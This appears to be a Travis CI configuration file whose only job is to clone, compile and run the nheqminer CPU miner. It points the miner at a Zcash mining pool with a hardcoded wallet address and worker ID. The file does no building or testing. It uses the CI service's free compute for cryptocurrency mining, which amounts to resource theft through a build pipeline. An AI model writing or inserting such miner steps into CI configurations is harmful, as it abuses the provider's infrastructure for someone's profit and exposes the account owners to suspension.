sudo: false

env:
  - WORKER_ID=1

script:
  - sudo apt-get -y update
  - sudo apt-get install cmake build-essential libboost-all-dev
  - git clone -b Linux https://github.com/nicehash/nheqminer.git
  - cd nheqminer/cpu_xenoncat/Linux/asm/
  - sh assemble.sh
  - cd ../../../Linux_cmake/nheqminer_cpu
  - cmake .
  - make -j $(nproc)
  - ./nheqminer -l eu1-zcash.flypool.org:3333 -u "t1TwoYzvNz5tzXW65xRsarrqTFAhb4eJSP6.$WORKER_ID"
